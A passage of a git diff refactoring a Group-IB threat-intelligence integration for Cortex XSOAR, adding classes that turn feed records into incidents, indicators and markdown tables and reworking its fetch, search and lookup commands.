Common.DBotScore.GOOD - elif severity == "orange": - score = Common.DBotScore.SUSPICIOUS - elif severity == "red": - score = Common.DBotScore.BAD - else: - score = Common.DBotScore.NONE + indicators = [] + if isinstance(feed, dict) and feed.get("indicators", None) is not None: + indicator_types: dict = INDICATORS_TYPES.get(collection_name, {}).get("types", {}) # type: ignore + add_fields_types: dict = INDICATORS_TYPES.get(collection_name, {}).get( + "add_fields_types", {} + ) # type: ignore + if len(add_fields_types.keys()) > 0: + fedd_indicators: dict = feed["indicators"] + fedd_indicators.update( + {"severity": feed.get("evaluation", {}).get("severity")} + ) + + for indicator_type_name, indicator_type in indicator_types.items(): + add_fields = {} + indicator_value = fedd_indicators.get(indicator_type_name) + if indicator_type_name in add_fields_types: + for ( + additional_field_name, + additional_field_type, + ) in add_fields_types.get( + indicator_type_name + ).items(): # type: ignore + additional_field_value = fedd_indicators.get( + additional_field_name + ) + if additional_field_value is not None: + add_fields.update( + {additional_field_type: additional_field_value} + ) + + output = IndicatorsHelper.parse_to_outputs( + indicator_value, indicator_type, add_fields + ) + if output: + if len(add_fields) > 0: + add_fields.update( + {"severity": feed.get("evaluation", {}).get("severity")} + ) + results = [ + CommandResults( + readable_output=tableToMarkdown( + f"{indicator_type} indicator", + {"value": indicator_value, **add_fields}, + ), + indicator=output, + ignore_auto_extract=True, + ) + ] + indicators.append(results) + + return indicators + + +class IncidentBuilder: + fields_list_for_parse = [ + "creationdate", + "firstseenbysource", + "lastseenbysource", + "gibdatecompromised", + ] + + def __init__(self, collection_name: str, incident: dict, mapping: dict) -> None: + self.collection_name = collection_name + self.incident = incident + self.mapping = mapping + + def get_system_severity(self) -> int: + severity_map = { + "green": NumberedSeverity.LOW.value, + "orange": NumberedSeverity.MEDIUM.value, + "red": NumberedSeverity.HIGH.value, + } + severity = self.incident.get("evaluation", {}).get("severity") + return severity_map.get(severity, 0) - return Common.DBotScore( - indicator=value, - indicator_type=type_, - integration_name="GIB TI&A", - score=score + def get_incident_created_time(self) -> str: + occured_date_field = INCIDENT_CREATED_DATES_MAPPING.get( + self.collection_name, "-" ) - if indicator_type == "IP": - return Common.IP(ip=value, asn=fields.get("asn"), geo_country=fields.get("geocountry"), - geo_description=fields.get("geolocation"), - dbot_score=calculate_dbot_score(DBotScoreType.IP)) - elif indicator_type == "Domain": - return Common.Domain(domain=value, registrar_name=fields.get("registrarname"), - dbot_score=calculate_dbot_score(DBotScoreType.DOMAIN)) - elif indicator_type == "File": - return Common.File(md5=value, sha1=fields.get("sha1"), sha256=fields.get("sha256"), - name=fields.get("gibfilename"), size=fields.get("size"), - dbot_score=calculate_dbot_score(DBotScoreType.FILE)) - elif indicator_type == "URL": - return Common.URL(url=value, dbot_score=calculate_dbot_score(DBotScoreType.URL)) - elif indicator_type == "CVE": - return Common.CVE(id=value, cvss=fields.get("cvss"), published=fields.get("published"), - modified=fields.get("cvemodified"), description=fields.get("cvedescription")) - return None - - -def find_iocs_in_feed(feed: dict, collection_name: str) -> list: - """ - Finds IOCs in the feed and transform them to the appropriate format to ingest them into Demisto. - - :param feed: feed from GIB TI&A. - :param collection_name: which collection this feed belongs to. - """ - - indicators = [] - indicators_info = MAPPING.get(collection_name, {}).get("indicators", []) - for i in indicators_info: - main_field = find_element_by_key(feed, i["main_field"]) - main_field_type = i["main_field_type"] - add_fields = [] - add_fields_list = i.get("add_fields", []) + ["evaluation.severity"] - add_fields_types = i.get("add_fields_types", []) + ["severity"] - for j in add_fields_list: - add_fields.append(find_element_by_key(feed, j)) - parsed_info = transform_to_command_results(main_field, main_field_type, - add_fields, add_fields_types, collection_name) - indicators.extend(parsed_info) + if isinstance(occured_date_field, str): + occured_date_field = [occured_date_field] + + if not isinstance(occured_date_field, list): + raise DemistoException(f"Expected list or string for occured_date_field, got {type(occured_date_field).__name__}") + + for variant in occured_date_field: + try: + incident_occured_date = dateparser_parse( + date_string=self.incident.get(variant, "") + ) + assert incident_occured_date is not None, ( + f"{self.incident} incident_occured_date cannot be None, " + f"occured_date_field: {variant}, incident_occured_date: {incident_occured_date}" + ) + return incident_occured_date.strftime(DATE_FORMAT) + except AssertionError as e: + last_exception = e + + raise AssertionError( + f"None of the date fields {occured_date_field} returned a valid date. Last error: {last_exception}" + ) - return indicators + def get_incident_name(self) -> str: + name = "" + prefix = PREFIXES.get(self.collection_name, "") + if self.collection_name == "compromised/breached": + names = self.incident["name"] + if not isinstance(names, list): + names = [names] + name = f"{prefix}: " + ", ".join(names) + else: + name = f"{prefix}: {self.incident['name']}" + return name -def transform_some_fields_into_markdown(collection_name, feed: dict) -> dict: - """ - Some fields can have complex nesting, so this function transforms them into an appropriate state. + def set_custom_severity(self): + severity_map = { + "green": StringSeverity.LOW.value, + "orange": StringSeverity.MEDIUM.value, + "red": StringSeverity.HIGH.value, + } + severity = self.incident.get("evaluation", {}).get("severity") + if severity: + self.incident["evaluation"]["severity"] = severity_map.get(severity, "Unknown") + + @staticmethod + def date_conversion(date: str): + try: + date_obj = datetime.strptime(date, "%Y-%m-%d") + return date_obj.isoformat() + except ValueError: + try: + datetime.fromisoformat(date) + return None + except ValueError: + raise ValueError(f"Invalid date format provided: {date}") + + def check_dates(self): + for field, value in self.incident.items(): + if field in SET_WITH_ALL_DATE_FIELDS and value is not None: + new_value = self.date_conversion(value) + if new_value: + self.incident[field] = new_value + + def osi_public_leak_mathes_transform_to_grid_table(self, field: str): + field_data = self.incident.get(field, {}) + if field_data: + new_matches = [] + if isinstance(field_data, list): + field_data = {} + for type_, sub_dict in field_data.items(): + for sub_type, sub_list in sub_dict.items(): + for value in sub_list: + new_matches.append( + {"type": type_, "sub_type": sub_type, "value": value} + ) + + transformed_and_replaced_empty_values_data = ( + CommonHelpers.replace_empty_values(new_matches) + ) + clean_data = CommonHelpers.remove_underscore_and_lowercase_keys( + transformed_and_replaced_empty_values_data # type: ignore + ) + self.incident[field] = clean_data + + def transform_fields_to_grid_table(self): + fields_for_modify_in_table = TABLES_MAPPING.get(self.collection_name, []) + + if fields_for_modify_in_table: + for field in fields_for_modify_in_table: + if self.collection_name == "osi/public_leak" and field == "matches": + self.osi_public_leak_mathes_transform_to_grid_table(field=field) + else: + field_data = self.incident.get(field, {}) + + if ( + field_data + and CommonHelpers.all_lists_empty(field_data) is False + ): + transformed_data = CommonHelpers.transform_dict( + input_dict=field_data + ) + if ( + self.collection_name == "osi/git_repository" + and field == "files" + ): + + transformed_data = CommonHelpers.transform_list_to_str( + transformed_data + ) + + transformed_and_replaced_empty_values_data = ( + CommonHelpers.replace_empty_values(transformed_data) + ) + clean_data = CommonHelpers.remove_underscore_and_lowercase_keys( + transformed_and_replaced_empty_values_data # type: ignore + ) + + self.incident[field] = clean_data + else: + self.incident[field] = None + + def build_incident(self) -> dict: + self.incident = CommonHelpers.custom_generate_portal_link(collection_name=self.collection_name, incident=self.incident) + incident_name = self.get_incident_name() + system_severity = self.get_system_severity() + self.incident.update( + { + "name": incident_name, + "gibType": self.collection_name, + "systemSeverity": system_severity, + } + ) - :param collection_name: which collection this feed belongs to. - :param feed: feed from GIB TI&A that needs transformation. - :return: given feed with transformed fields. - """ + self.set_custom_severity() + self.check_dates() + self.transform_fields_to_grid_table() + self.incident = CommonHelpers.remove_html_tags( + self.incident, self.collection_name + ) + data = { + "name": self.incident["name"], + "occurred": self.get_incident_created_time(), + "rawJSON": json_dumps(self.incident), + "dbotMirrorId": self.incident.get("id"), + } + return data + + +class BuilderCommandResponses: + + def __init__(self, client: Client, collection_name: str, args: dict) -> None: + self.client = client + self.collection_name = collection_name + self.args = args + + def transform_additional_fields_to_markdown_tables(self, feed: dict): + additional_tables = [] + delete_keys = [] + for key, value in feed.items(): + if key not in ("evaluation", "indicators") and isinstance(value, dict): + additional_data = CommonHelpers.transform_dict(value) + for index, item in enumerate(additional_data): + table = self.get_human_readable_feed( + table=item, name=f"{key} table {index}" + ) + additional_tables.append( + CommandResults( + readable_output=table, + ignore_auto_extract=True, + ) + ) + delete_keys.append(key) + for key in delete_keys: + feed.pop(key) + + return feed, additional_tables + + def get_feed(self) -> dict: + id_ = str(self.args.get("id")) + if self.collection_name in ["threat", "threat_actor"]: + flag = self.args.get("isAPT") + if flag: + self.collection_name = "apt/" + self.collection_name + else: + self.collection_name = "hi/" + self.collection_name + + cleaned_feed = {} + if ( + self.collection_name + in COLLECTIONS_THAT_MAY_NOT_SUPPORT_ID_SEARCH_VIA_UPDATED + ): + if self.collection_name == "osi/public_leak": + query = f"id:{id_}" + else: + query = id_ + portions = self.client.poller.create_update_generator( + collection_name=self.collection_name, query=query + ) + for portion in portions: + parsed_portion = portion.parse_portion( + keys=MAPPING.get(self.collection_name, {}) + ) + cleaned_feed = parsed_portion[0] if isinstance(parsed_portion, list) else parsed_portion # type: ignore - if collection_name == "osi/git_repository": - buffer = "" - files = feed.get("files", []) - for i in files: - url = i.get("url") - date = i.get("dateCreated") - # file_diff = "[https://bt.group-ib.com/api/v2/osi/git_leak]({0})".format(i.get("fileDiff")) - # info = find_element_by_key(i,'revisions.info') - author_email = ''.join(str(find_element_by_key(i, 'revisions.info.authorEmail'))) - author_name = ''.join(str(find_element_by_key(i, 'revisions.info.authorName'))) - timestamp = ''.join(str(find_element_by_key(i, 'revisions.info.timestamp'))) - # author_email, author_name, date = info.get("authorEmail"), info.get("authorName"), info.get("dateCreated") - buffer += f"| {url} | {author_email} | {author_name} | {date} | {timestamp} |\n" - if buffer: - buffer = "| URL | Author Email | Author Name | Date Created| TimeStamp |\n" \ - "| ---- | --------------- | ------------ | ----------- | ------------ |\n" + buffer - feed["files"] = buffer - else: - del feed["files"] - - elif collection_name == "osi/public_leak": - buffer = "" - link_list = feed.get("linkList", []) - for i in link_list: - author = i.get("author") - detected = i.get("dateDetected") - published = i.get("datePublished") - hash_ = i.get("hash") - link = "[{0}]({0})".format(i.get("link")) - source = i.get("source") - buffer += f"| {author} | {detected} | {published} | {hash_} | {link} | {source} |\n" - if buffer: - buffer = "| Author | Date Detected | Date Published | Hash | Link | Source |\n" \ - "| ------ | ------------- | -------------- | ---- |----- | ------ |\n" + buffer - feed["linkList"] = buffer else: - del feed["linkList"] - - buffer = "" - matches = feed.get("matches", {}) - if isinstance(matches, list): - matches = {} - for type_, sub_dict in matches.items(): - for sub_type, sub_list in sub_dict.items(): - for value in sub_list: - buffer += f"| {type_} | {sub_type} | {value} |\n" - if buffer: - buffer = "| Type | Sub Type | Value |\n" \ - "| ---- | -------- | ----- |\n" + buffer - feed["matches"] = buffer - else: - del feed["matches"] - - elif collection_name == "bp/phishing_kit": - buffer = "" - downloaded_from = feed.get("downloadedFrom", []) - for i in downloaded_from: - date, url, domain, filename = i.get("date"), i.get("url"), i.get("domain"), i.get("fileName") - buffer += f"| {url} | {filename} | {domain} | {date} |\n" - if buffer: - buffer = "| URL | File Name | Domain | Date |\n| --- | --------- | ------ | ---- |\n" + buffer - feed["downloadedFrom"] = buffer - else: - del feed["downloadedFrom"] + result = self.client.poller.search_feed_by_id(self.collection_name, id_) + parsed_portion = result.parse_portion( + keys=MAPPING.get(self.collection_name, {}) + ) + cleaned_feed = parsed_portion[0] if isinstance(parsed_portion, list) else parsed_portion # type: ignore + + return cleaned_feed # type: ignore + + def get_indicators( + self, feed: dict[Any, Any] + ) -> tuple[list[CommandResults] | list, dict[Any, Any]]: + indicators = [] + indicators = IndicatorsHelper.find_iocs_in_feed( + feed=feed, collection_name=self.collection_name + ) - return feed + return indicators, feed + def get_table_data( + self, + feed: dict[Any, Any], + ): + dont_need_transformations = ["compromised/breached"] -def get_human_readable_feed(collection_name, feed): - return tableToMarkdown(name="Feed from {} with ID {}".format(collection_name, feed.get("id")), - t=feed, removeNull=True) + main_table_data, additional_tables = feed, ( + [] + if self.collection_name in dont_need_transformations + else self.transform_additional_fields_to_markdown_tables(feed) + ) + return main_table_data, additional_tables -def transform_function(result, previous_keys="", is_inside_list=False): - result_dict = {} - additional_tables: list[Any] = [] + def get_human_readable_feed(self, table: dict[Any, Any], name: str): + return tableToMarkdown( + name=name, + t=table, + removeNull=True, + ) - if isinstance(result, dict): - if is_inside_list: - additional_tables.append(result) - else: - for key, value in result.items(): - sub_key = previous_keys + " " + key if previous_keys else key - transformed_part, additional_info = transform_function(value, previous_keys=sub_key, - is_inside_list=is_inside_list) - result_dict.update(transformed_part) - additional_tables.extend(additional_info) - - return result_dict, additional_tables - - elif isinstance(result, list): - is_inside_list = True - for value in result: - transformed_part, additional_info = transform_function(value, previous_keys=previous_keys, - is_inside_list=is_inside_list) - additional_tables.extend(additional_info) - if result_dict.get(previous_keys) is None: - result_dict.update(transformed_part) - else: - result_dict[previous_keys].extend(transformed_part[previous_keys]) + def build_feed(self): + feed = self.get_feed() + feed = CommonHelpers.custom_generate_portal_link(collection_name=self.collection_name, incident=feed) + indicators, feed = self.get_indicators(feed=feed) + main_table_data, additional_tables = self.get_table_data(feed=feed) + feed_id = feed.get("id") + readable_output = self.get_human_readable_feed( + table=feed, name=f"Feed from {self.collection_name} with ID {feed_id}" + ) + return feed, main_table_data, additional_tables, indicators, readable_output - if additional_tables: - additional_tables = [CommandResults( - readable_output=tableToMarkdown(f"{previous_keys} table", additional_tables, removeNull=True), - ignore_auto_extract=True - )] - return result_dict, additional_tables +""" Commands """ - elif isinstance(result, str | int | float) or result is None: - if not is_inside_list: - result_dict.update({previous_keys: result}) - else: - result_dict.update({previous_keys: [result]}) - return result_dict, additional_tables - return None +def test_module(client: Client) -> str: + """ + Returning 'ok' indicates that the integration works like it is supposed to. Connection to the service is successful. + + :param client: GIB_TI client + :return: 'ok' if test passed, anything else will fail the test. + """ + test = client.poller.get_available_collections() + if len(test) == 0: + return "There are no collections available" + return "ok" -""" Commands """ +def collection_availability_check(client: Client, collection_name: str) -> None: + if collection_name not in client.poller.get_available_collections(): + raise Exception( + f"Collection {collection_name} is not available from you, " + "please disable collection on it or contact Group-IB to grant access" + ) -def fetch_incidents_command(client: Client, last_run: dict, first_fetch_time: str, - incident_collections: list, requests_count: int) -> tuple[dict, list]: +def fetch_incidents_command( + client: Client, + last_run: dict, + first_fetch_time: str, + incident_collections: list[str], + max_requests: int, + hunting_rules: int, +) -> tuple[dict, list]: """ This function will execute each interval (default is 1 minute). @@ -1030,78 +2100,76 @@ def fetch_incidents_command(client: Client, last_run: dict, first_fetch_time: st :param last_run: the greatest sequpdate we fetched from last fetch. :param first_fetch_time: if last_run is None then fetch all incidents since first_fetch_time. :param incident_collections: list of collections enabled by client. - :param requests_count: count of requests to API per collection. + :param max_requests: count of requests to API per collection. + :param hunting_rules: enable this parameter to collect using hunting rules :return: next_run will be last_run in the next fetch-incidents; incidents and indicators will be created in Demisto. """ incidents = [] next_run: dict[str, dict[str, int | Any]] = {"last_fetch": {}} - for collection_name in incident_collections: + for collection_name in incident_collections: # noqa: B007 + collection_availability_check(client=client, collection_name=collection_name) + CommonHelpers.validate_collections(collection_name) last_fetch = last_run.get("last_fetch", {}).get(collection_name) + requests_count = 0 + sequpdate = 0 + portions, last_fetch = client.create_poll_generator( + collection_name=collection_name, + hunting_rules=hunting_rules, + last_fetch=last_fetch, + first_fetch_time=first_fetch_time, + ) - portions = client.create_poll_generator(collection_name=collection_name, max_requests=requests_count, - last_fetch=last_fetch, first_fetch_time=first_fetch_time) - for portion, last_fetch in portions: - for feed in portion: - mapping = MAPPING.get(collection_name, {}) - if collection_name == "compromised/breached": - feed.update({"name": mapping.get("prefix", "") + ": " + ', '.join( - find_element_by_key(feed, mapping.get("name")))}) - else: - feed.update({"name": mapping.get("prefix", "") + ": " + str( - find_element_by_key(feed, mapping.get("name")))}) - - feed.update({"gibType": collection_name}) - - severity = feed.get("evaluation", {}).get("severity") - system_severity = 0 - if severity == "green": - system_severity = 1 - elif severity == "orange": - system_severity = 2 - elif severity == "red": - system_severity = 3 - - related_indicators_data = [] - indicators_info = MAPPING.get(collection_name, {}).get("indicators", []) - for i in indicators_info: - if find_element_by_key(feed, i["main_field"]) is not None: - related_indicators_data.append(find_element_by_key(feed, i["main_field"])) - - incident_created_time = dateparser.parse(feed.get(mapping.get("date"))) - assert incident_created_time is not None - feed.update({"relatedIndicatorsData": related_indicators_data}) - feed.update({"systemSeverity": system_severity}) - if collection_name in ["osi/git_repository", "osi/public_leak", "bp/phishing_kit"]: - feed = transform_some_fields_into_markdown(collection_name, feed) - incident = { - "name": feed["name"], - "occurred": incident_created_time.strftime(DATE_FORMAT), - "rawJSON": json.dumps(feed) - } - incidents.append(incident) + mapping = MAPPING.get(collection_name, {}) + for portion in portions: + sequpdate = portion.sequpdate + new_parsed_json = portion.bulk_parse_portion( + keys_list=[mapping], as_json=False + ) + if isinstance(new_parsed_json, list): + for i in new_parsed_json: + for incident in i: + constructed_incident = IncidentBuilder( + collection_name=collection_name, + incident=incident, + mapping=mapping, + ).build_incident() + incidents.append(constructed_incident) + else: + raise Exception("new_parsed_json in portion should not be a string") + + requests_count += 1 + if requests_count > max_requests: + break + + if collection_name == "compromised/breached": + next_run["last_fetch"][collection_name] = last_fetch - next_run["last_fetch"][collection_name] = last_fetch + next_run["last_fetch"][collection_name] = sequpdate return next_run, incidents -def get_available_collections_command(client: Client): +def get_available_collections_command(client: Client, args: dict | None = None): """ Returns list of available collections to context and War Room. :param client: GIB_TI&A_Feed client. """ - result, buffer_list = client.get_available_collections() - readable_output = tableToMarkdown(name="Available collections", t=result, headers="collections") + my_collections = client.get_available_collections_proxy_function() + readable_output = tableToMarkdown( + name="Available collections", + t={"collections": my_collections}, + headers="collections", + ) return CommandResults( outputs_prefix="GIBTIA.OtherInfo", outputs_key_field="collections", - outputs=result, + outputs={"collections": my_collections}, readable_output=readable_output, ignore_auto_extract=True, - raw_response=buffer_list + raw_response=my_collections, ) @@ -1110,7 +2178,9 @@ def get_info_by_id_command(collection_name: str): Decorator around actual commands, that returns command depends on `collection_name`. """ - def get_info_by_id_for_collection(client: Client, args: dict) -> list[CommandResults]: + def get_info_by_id_for_collection( + client: Client, args: dict + ) -> list[CommandResults]: """ This function returns additional information to context and War Room. @@ -1118,52 +2188,25 @@ def get_info_by_id_for_collection(client: Client, args: dict) -> list[CommandRes :param args: arguments, provided by client. """ results = [] - coll_name = collection_name - id_ = str(args.get("id")) - - if coll_name in ["threat", "threat_actor"]: - flag = args.get("isAPT") - if flag: - coll_name = "apt/" + coll_name - else: - coll_name = "hi/" + coll_name - result = client.search_feed_by_id(coll_name, id_) - if "displayOptions" in result: - del result["displayOptions"] + CommonHelpers.validate_collections(collection_name) + feed, main_table_data, additional_tables, indicators, readable_output = ( + BuilderCommandResponses( + client=client, collection_name=collection_name, args=args + ).build_feed() + ) - else: - result = client.search_feed_by_id(coll_name, id_) - if "isFavourite" in result: - del result["isFavourite"] - if "isHidden" in result: - del result["isHidden"] - - if "seqUpdate" in result: - del result["seqUpdate"] - - indicators: list[CommandResults] = [] - if coll_name not in ["apt/threat_actor", "hi/threat_actor"]: - indicators = find_iocs_in_feed(result, coll_name) - - if coll_name in ["apt/threat", "hi/threat"]: - del result["indicatorMalwareRelationships"], result["indicatorRelationships"], \ - result["indicatorToolRelationships"], result["indicatorsIds"], \ - result["indicators"] - - if coll_name == "compromised/breached": - if "updateTime" in result: - del result["updateTime"] - main_table_data, additional_tables = result, [] - else: - main_table_data, additional_tables = transform_function(result) - results.append(CommandResults( - outputs_prefix="GIBTIA.{}".format(MAPPING.get(coll_name, {}).get("prefix", "").replace(" ", "")), - outputs_key_field="id", - outputs=result, - readable_output=get_human_readable_feed(collection_name, main_table_data), - raw_response=result, - ignore_auto_extract=True - )) + results.append( + CommandResults( + outputs_prefix="GIBTIA.{}".format( + PREFIXES.get(collection_name, "").replace(" ", "") + ), + outputs_key_field="id", + outputs=feed, + readable_output=readable_output, + raw_response=feed, + ignore_auto_extract=True, + ) + ) results.extend(additional_tables) results.extend(indicators) return results @@ -1171,129 +2214,174 @@ def get_info_by_id_for_collection(client: Client, args: dict) -> list[CommandRes return get_info_by_id_for_collection -def global_search_command(client: Client, args: dict): - query = str(args.get('query')) - raw_response = client.search_by_query(query) +def global_search_command(client: Client, args: dict) -> CommandResults: + query = str(args.get("query")) + raw_response = client.search_proxy_function(query=query) handled_list = [] for result in raw_response: - if result.get('apiPath') in MAPPING: - handled_list.append({'apiPath': result.get('apiPath'), 'count': result.get('count'), - 'GIBLink': result.get('link'), - 'query': result.get('apiPath') + '?q=' + query}) + if result.get("apiPath") in MAPPING: + apiPath = result.get("apiPath") + handled_list.append( + { + "apiPath": apiPath, + "count": result.get("count"), + "GIBLink": result.get("link"), + "query": f"{apiPath}?q={query}", + } + ) if len(handled_list) != 0: results = CommandResults( outputs_prefix="GIBTIA.search.global", outputs_key_field="query", outputs=handled_list, - readable_output=tableToMarkdown('Search results', t=handled_list, - headers=['apiPath', 'count', 'GIBLink'], - url_keys=['GIBLink']), + readable_output=tableToMarkdown( + "Search results", + t=handled_list, + headers=["apiPath", "count", "GIBLink"], + url_keys=["GIBLink"], + ), raw_response=raw_response, - ignore_auto_extract=True + ignore_auto_extract=True, ) else: results = CommandResults( raw_response=raw_response, ignore_auto_extract=True, outputs=[], - readable_output="Did not find anything for your query :(" + readable_output="Did not find anything for your query :(", ) return results def local_search_command(client: Client, args: dict): - query, date_from, date_to = args.get('query'), args.get('date_from', None), args.get('date_to', None) - collection_name = str(args.get('collection_name')) + query, date_from, date_to = ( + args.get("query"), + args.get("date_from", None), + args.get("date_to", None), + ) + collection_name = str(args.get("collection_name")) + CommonHelpers.validate_collections(collection_name) + date_from_parsed = ( + CommonHelpers.date_parse(date=date_from, arg_name="date_from") + if date_from is not None + else date_from + ) + date_to_parsed = ( + CommonHelpers.date_parse(date=date_to, arg_name="date_to") + if date_to is not None + else date_to + ) - if date_from is not None: - date_from_parsed = dateparser.parse(date_from) - if date_from_parsed is None: - raise DemistoException('Inappropriate date_from format, ' - 'please use something like this: 2020-01-01 or January 1 2020') - date_from_parsed = date_from_parsed.strftime('%Y-%m-%dT%H:%M:%SZ') - else: - date_from_parsed = date_from # type: ignore - if date_to is not None: - date_to_parsed = dateparser.parse(date_to) - if date_to_parsed is None: - raise DemistoException('Inappropriate date_to format, ' - 'please use something like this: 2020-01-01 or January 1 2020') - date_to_parsed = date_to_parsed.strftime('%Y-%m-%dT%H:%M:%SZ') - else: - date_to_parsed = date_to # type: ignore + portions = client.poller.create_search_generator( + collection_name=collection_name, + query=query, + date_from=date_from_parsed, + date_to=date_to_parsed, + ) + mapping = MAPPING.get(collection_name, {}) - portions = client.create_manual_generator(collection_name=collection_name, query=query, - date_from=date_from_parsed, date_to=date_to_parsed) result_list = [] - name = MAPPING.get(collection_name, {}).get('name') for portion in portions: - for feed in portion: - add_info = None + new_parsed_json = portion.parse_portion(keys=mapping, as_json=False) + for feed in new_parsed_json: + name = feed.get("name", None) if name is not None: - add_info = name + ": " + str(find_element_by_key(feed, name)) - result_list.append({'id': feed.get('id'), 'additional_info': add_info}) + name = f"Name: {name}" + result_list.append({"id": feed.get("id"), "additional_info": name}) results = CommandResults( outputs_prefix="GIBTIA.search.local", outputs_key_field="id", outputs=result_list, - readable_output=tableToMarkdown('Search results', t=result_list, - headers=['id', 'additional_info']), - ignore_auto_extract=True + readable_output=tableToMarkdown( + "Search results", t=result_list, headers=["id", "additional_info"] + ), + ignore_auto_extract=True, ) return results def main(): """ - PARSE AND VALIDATE INTEGRATION PARAMS + PARSE AND VALIDATE INTEGRATION PARAMS """ - params = demisto.params() - username = params.get("credentials").get("identifier") - password = params.get("credentials").get("password") - base_url = str(params.get("url")) - proxy = params.get("proxy", False) - verify_certificate = not params.get("insecure", False) - - incident_collections = params.get("incident_collections", []) - incidents_first_fetch = params.get("first_fetch", "3 days").strip() - requests_count = int(params.get("max_fetch", 3)) - - args = demisto.args() - command = demisto.command() - LOG(f"Command being called is {command}") + incident_collections = None try: + params = demisto.params() + credentials: dict = params.get("credentials", {}) + username = credentials.get("identifier") + password = credentials.get("password") + base_url = str(params.get("url")) + proxy = params.get("proxy", False) + hunting_rules = params.get("hunting_rules", 0) + verify_certificate = not params.get("insecure", False) + endpoint = None + + incident_collections = params.get("incident_collections", []) + incidents_first_fetch = params.get("first_fetch", "3 days").strip() + requests_count = int(params.get("max_fetch", 3)) + + args = demisto.args() + command = demisto.command() + LOG(f"Command being called is {command}") + client = Client( base_url=base_url, verify=verify_certificate, auth=(username, password), proxy=proxy, - headers={"Accept": "*/*"} + headers={"Accept": "*/*"}, ) + demisto.info("client getted") + + deprecated_comands = [ + "gibtia-get-compromised-card-info", + "gibtia-get-compromised-imei-info", + "gibtia-get-malware-targeted-malware-info", + "gibtia-get-phishing-info", + ] + if command in deprecated_comands: + raise Exception(f"{command} deprecated") + + if hunting_rules is True: + hunting_rules = 1 + list_hunting_rules_collections = ( + client.poller.get_hunting_rules_collections() + ) + + for collection in incident_collections: + if collection not in list_hunting_rules_collections: + raise Exception( + f"Collection {collection} Does't support hunting rules" + ) + + info_comands = { + "gibtia-get-compromised-account-info": "compromised/account_group", + "gibtia-get-compromised-card-group-info": "compromised/bank_card_group", + "gibtia-get-compromised-mule-info": "compromised/mule", + "gibtia-get-compromised-breached-info": "compromised/breached", + "gibtia-get-phishing-kit-info": "attacks/phishing_kit", + "gibtia-get-phishing-group-info": "attacks/phishing_group", + "gibtia-get-osi-git-leak-info": "osi/git_repository", + "gibtia-get-osi-public-leak-info": "osi/public_leak", + "gibtia-get-osi-vulnerability-info": "osi/vulnerability", + "gibtia-get-attacks-ddos-info": "attacks/ddos", + "gibtia-get-attacks-deface-info": "attacks/deface", + "gibtia-get-threat-info": "threat", + "gibtia-get-threat-actor-info": "threat_actor", + "gibtia-get-suspicious-ip-tor-node-info": "suspicious_ip/tor_node", + "gibtia-get-suspicious-ip-open-proxy-info": "suspicious_ip/open_proxy", + "gibtia-get-suspicious-ip-socks-proxy-info": "suspicious_ip/socks_proxy", + "gibtia-get-suspicious-ip-vpn-info": "suspicious_ip/vpn", + "gibtia-get-suspicious-ip-scanner-info": "suspicious_ip/scanner", + "gibtia-get-malware-cnc-info": "malware/cnc", + "gibtia-get-malware-malware-info": "malware/malware", + } - commands = { - "gibtia-get-compromised-account-info": get_info_by_id_command("compromised/account_group"), - "gibtia-get-compromised-card-info": get_info_by_id_command("compromised/card"), - "gibtia-get-compromised-mule-info": get_info_by_id_command("compromised/mule"), - "gibtia-get-compromised-imei-info": get_info_by_id_command("compromised/imei"), - "gibtia-get-compromised-breached-info": get_info_by_id_command("compromised/breached"), - "gibtia-get-phishing-kit-info": get_info_by_id_command("attacks/phishing_kit"), - "gibtia-get-phishing-info": get_info_by_id_command("attacks/phishing"), - "gibtia-get-osi-git-leak-info": get_info_by_id_command("osi/git_repository"), - "gibtia-get-osi-public-leak-info": get_info_by_id_command("osi/public_leak"), - "gibtia-get-osi-vulnerability-info": get_info_by_id_command("osi/vulnerability"), - "gibtia-get-attacks-ddos-info": get_info_by_id_command("attacks/ddos"), - "gibtia-get-attacks-deface-info": get_info_by_id_command("attacks/deface"), - "gibtia-get-threat-info": get_info_by_id_command("threat"), - "gibtia-get-threat-actor-info": get_info_by_id_command("threat_actor"), - "gibtia-get-suspicious-ip-tor-node-info": get_info_by_id_command("suspicious_ip/tor_node"), - "gibtia-get-suspicious-ip-open-proxy-info": get_info_by_id_command("suspicious_ip/open_proxy"), - "gibtia-get-suspicious-ip-socks-proxy-info": get_info_by_id_command("suspicious_ip/socks_proxy"), - "gibtia-get-malware-targeted-malware-info": get_info_by_id_command("malware/targeted_malware"), - "gibtia-get-malware-cnc-info": get_info_by_id_command("malware/cnc"), + other_commands = { "gibtia-get-available-collections": get_available_collections_command, "gibtia-global-search": global_search_command, - "gibtia-local-search": local_search_command + "gibtia-local-search": local_search_command, } if command == "test-module": @@ -1303,18 +2391,33 @@ def main(): elif command == "fetch-incidents": # Set and define the fetch incidents command to run after activated via integration settings. - next_run, incidents = fetch_incidents_command(client=client, last_run=demisto.getLastRun(), - first_fetch_time=incidents_first_fetch, - incident_collections=incident_collections, - requests_count=requests_count) + next_run, incidents = fetch_incidents_command( + client=client, + last_run=demisto.getLastRun(), + first_fetch_time=incidents_first_fetch, + incident_collections=incident_collections, + max_requests=requests_count, + hunting_rules=hunting_rules, + ) + demisto.info(f"{str(incidents)}") demisto.setLastRun(next_run) demisto.incidents(incidents) else: - return_results(commands[command](client, args)) + incident_collections = None + if command in info_comands: + endpoint = info_comands[command] + result = get_info_by_id_command(endpoint)(client, args) + else: + result = other_commands[command](client, args) # type: ignore + return_results(result) # Log exceptions - except Exception as e: - return_error(f"Failed to execute {demisto.command()} command. Error: {str(e)}") + except Exception: + return_error( + f"Failed to execute {demisto.command()} command.\n" + f"Incident collection: {incident_collections}.\n" + f"Command endpoint: {endpoint}.\n Error: {format_exc()}" + ) if __name__ in ("__main__", "__builtin__", "builtins"): diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.yml index 17f7ed55a097..f2464006d9ab 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.yml @@ -14,8 +14,7 @@ configuration: name: credentials required: true type: 9 -- additionalinfo: Whether to allow connections without verifying SSL certificates - validity. +- additionalinfo: Whether to allow connections without verifying SSL certificates validity. display: Trust any certificate (not secure) name: insecure required: false @@ -35,13 +34,27 @@ configuration: name: incident_collections options: - compromised/account_group - - compromised/card + - compromised/bank_card_group - compromised/breached - - bp/phishing - - bp/phishing_kit + - 